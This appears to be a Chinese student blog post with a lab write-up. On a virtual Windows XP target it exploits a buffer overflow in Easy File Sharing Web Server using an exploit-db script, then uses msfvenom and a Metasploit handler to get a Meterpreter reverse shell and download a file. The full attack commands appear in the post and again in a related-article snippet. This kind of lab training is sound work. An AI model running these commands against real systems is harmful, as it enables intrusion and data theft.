复现任务A

最新推荐文章于 2024-09-05 11:30:11 发布
最新推荐文章于 2024-09-05 11:30:11 发布
阅读量115 收藏
点赞数
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63970272/article/details/127986194
版权
  • 漏洞渗透测试 
    1. 靶机(Windows)安装 easy file sharing server(efssetup_2018.zip), 
    该服务存在漏洞。 
    2. 利用 Nmap 扫描发现靶机(Windows)运行了该服务。P99-100 
    3. 利用该漏洞,使得靶机运行计算器。P116-119 
    复现过程: 
    环境 
    靶机:WindowsXP(IP:192.168.19.130) 
    攻击机:KALI(IP:192.168.19.128)
    平台:VMware 16.2.4 
    靶机配置 
    在靶机上安装并启动 Easy File Sharing Web Server 2018 程序。

信息收集 
查询靶机ip地址

发现靶机 IP:192.168.19.130 
使用 nmap 进行扫描主机:nmap -sV 192.168.19.130

发现目标靶机 80 端口的 http 服务版本是 Easy File Sharing Web Server httpd 6.9 ,这个版本存在缓冲区溢出漏洞。缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。

渗透过程  
我们在 kali 自带的漏洞利用脚本库中寻找 easy file sharing 的漏洞利用脚本:searchsploit easy file sharing

我们在这里使用的脚本可以让服务器开启计算器并使服务崩溃: 
Python2 /usr/exploitdb/exploits/windows/remote/39009.py 
192.168.19.130 80

执行成功后,查看目标靶机,已经弹出计算器。

二.Metasploit 应用 
1. 生成主控端、被控端。 
2. 获得靶机(Windows)控制权。 
3. 下载靶机上任意一个文件。 
P121-123;140-145 

复现过程: 
环境 
靶机:WindowsXP(IP:192.168.19.130) 
攻击机:KALI(IP:192.168.19.128) 
平台:VMware 16.2.4 

渗透过程 
1. 生成被控端 
在 kali 终端执行命令: 
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.128 lport=5000 -f exe -o /root/payload.exe 
该命令是用 msfvenom 来生成一个被控端程序,如果我们让这个文件在靶机上执行的话,那么这台计算机就会立刻回连到 192.168.19.128上。

2. 生成主控端 
在 kali 终端执行命令启动 Metasploit: 
msfconsole 


依次执行以下命令: 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set lhost 192.168.19.128 
set lport 5000 
exploit

此时,我们将生成的exe程序复制到靶机上运行:

成功获取权限,现在可以对靶机进行控制了。执行ls查看当前目录文件。输入download 吾爱破解工具.lnk下载吾爱破解工具.lnk软件。

成功下载靶机上的文件。 

我是可乐 我会冒泡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
YoloV8实战:复现基于多任务的YoloV8方案
m0_47867638的博客
05-20 761
自动驾驶中多任务学习,特别是通过设计一种自适应、实时且轻量级的模型来同时处理目标检测、可行驶区域分割和车道线分割,是一种非常有用的研究方法,其中最出名的当属YOLOP模型。然后,YoloP在实时性上并没有得到满足,本文复现基于YoloV8的对任务方案,并在BDD100K数据集上验证和测试,给这方面研究的同学提供便利。BDD100k是一个大规模的自动驾驶数据集,包含了多种复杂的驾驶场景和天气条件。模型在该数据集上取得了具有竞争力的结果,证明了其在实际应用中的有效性。
脑机接口运动想象源码复现
02-20
python代码,数据集为BCI IV-2a ,四分类任务网络模型EEG-TCNet 基于tensorflow EEG-TCNet: An Accurate Temporal Convolutional Network for Embedded Motor-Imagery Brain–Machine Interfaces
Metasploit应用
m0_64005272的博客
11-05 711
使用命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.131.128 lport=5000 -f exe -o /var/payload.exe。接下来输入命令:download C:\\hh.txt /home/ 下载hh.txt文件到home文件夹里。lhost的值为Kali的ip,保存的位置为:/var/payload.exe。结果在home文件夹中找到hh.txt。在var文件目录下找到payload.exe。
IC后端物理实现自动化工具 OpenROAD系列(一)OpenROAD开发环境搭建
热门推荐
一名FPGA芯片设计爱好者的技术博客
01-29 1万+
我是雪天鱼,一名FPGA爱好者,研究方向是FPGA架构探索。 笔记同步在我的文章目录一、Code下载和编译1.1 Code下载与依赖安装二、代码编译遇到的问题和解决方法 OpenROAD 支持 RTL to GDS Flow ,即芯片设计的后端物理实现。 一、Code下载和编译 1.1 Code下载与依赖安装 打开终端,输入 git clone --recursive https://github.com/The-OpenROAD-Project/OpenROAD.git 再安装依赖,输入: cd Op
easy file sharing server漏洞渗透测试及Metasploit应用
zzzfff__的博客
11-06 462
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。
复现a20210415RAW (2)1
08-08
标题 "复现a20210415RAW (2)1" 暗示了这是一个关于在RAW图像领域复现某个特定研究项目的工作,可能是对2021年4月15日进行的一项实验或研究的再实现。描述中的 "(1)072Due to the lack of large-scale RAW image ...
基于pytorch的DenseFuse复现.zip
11-10
PyTorch还具有强大的GPU加速功能,适用于大规模的计算任务。 **2. DenseFuse算法原理** DenseFuse的核心思想是利用深度学习的方法对多源图像进行逐像素的融合处理。首先,算法通过卷积神经网络(CNN)提取输入图像...
activity A 跳转 activity B 如何才能复现 activity A 不走onPause
07-14
在这种情况下,Activity A不会走`onPause`方法,因为它所在的任务栈已经不再可见。 2. 使用`finish()`方法立即关闭Activity A:如果在启动Activity B之前立即调用了Activity A的`finish()`方法来关闭它,那么...
攻击篇--远程控制(一)生成被控端与主控端
qq_40424448的博客
06-03 4658
笑脸漏洞与6200 如果目标主机被使用笑脸漏洞成功渗透,那么会自动在6200端口打开一个连接,可以实现攻击者对目标主机的控制。这是一个很经典的案例,如果将这个连接比作是正好能让一个人爬行通过,那么接下来的远程控制篇就是如何将这个缺口变大,大的卡车都可以自由出入。而这个大的入口,就是我们平常所说的远程控制。 netcat ......
使用Nmap对靶机进行信息收集以及Nessus的安装并对靶机进行的漏洞扫描
m0_47510703的博客
01-17 8604
以下是对本地搭建的靶机Metasploitable2-Linux进行的信息收集 以及Nessus的安装并对靶机进行的漏洞扫描
从入门到入土:nmap出击:使用nmap扫描某台靶机,给出并解读靶机环境的配置情况
Q_U_A_R_T_E_R的博客
09-06 6491
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益。不合适引用,自当删除! 若被用于非法行为,与我本人无关 nmap出击任务操作具体语句010203040506 任务 任务一:使用nmap扫描某台靶机,给出并解读靶机环境的配置情况,撰写实验分析报告。 使用nmap扫描某台靶机,给出并解读靶机环境的配置情况 操作 使用nmap扫描靶机 本来想在windows下使用zenmap替代,
UDP协议
hyldzbg的博客
09-04 869
把当前要计算校验和的数据,每个字节,都进行累加,把结果保存到这两个字节的变量(校验和)中,过程中溢出也没关系,如果中间某个数据,出现传输错误,第二次计算的校验和就会和第一次不同(CRC这个算法其实不是特别靠谱,比如如果前一个字节大小少1,后一个字节大小多1,那么最后得到的校验和任然相同,但是数据可能已经不同了)。描绘这个数据报的报文长度(包含报头),这里的长度是指该报文有多少个字节,因为只有16位比特位的大小,因为数据传输可能会出错,所以需要一定的方法知道所传输的数据是否正确传输。
网络第五章:多路转接
最新发布
qincjun的博客
09-05 569
2.HTTP1.1采用了长连接的方式来进行通信:建立连接,服务器响应完之后,不断开连接,活跃的用户对服务器发送请求,服务器都会正常响应;对不活跃的用户,不进行任何操作;events是分配好的epoll_event结构体数组.epoll将会把发生的事件赋值到events数组中 (events不可以是空指针,内核只负责把数据复制到这个events数组中,不会去帮助我们在用户态中分配内存).epoll通过这些值的设定,来监视fd的行为,如果fd做了这些行为,则会通过epoll_wait来反馈给上层,进行处理。
计算机网络-VRRP工作原理
Linux基础知识、计算机网络基础学习分享。
09-03 747
初始化状态就是在设备上配置完成时的状态,Master状态为主设备的状态,Nackup状态为备份设备的状态,备份设备会监听主设备发送的Advertisement报文,当定时器超时都没有收到主设备的报文时则备份设备切换为Master状态。R1与R2交换VRRP报文,优先级一样,通过比较接口IP地址选举Master路由器,由于R2的接口IP地址大于R1的接口IP地址,因此R2被选举为Master路由器。进行比较,先比较优先级,优先级大的优先,优先级相等则比较接口IP地址,IP地址大的优先,
观测云核心技术解密:eBPF Tracing 实现原理
观测云的博客
09-03 942
通过 eBPF,开发者可以在不修改内核源码的情况下,对内核功能进行扩展和监控。eBPF Tracing 利用这一技术,对系统调用、内核函数等进行跟踪,从而实现对应用行为的深入洞察。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值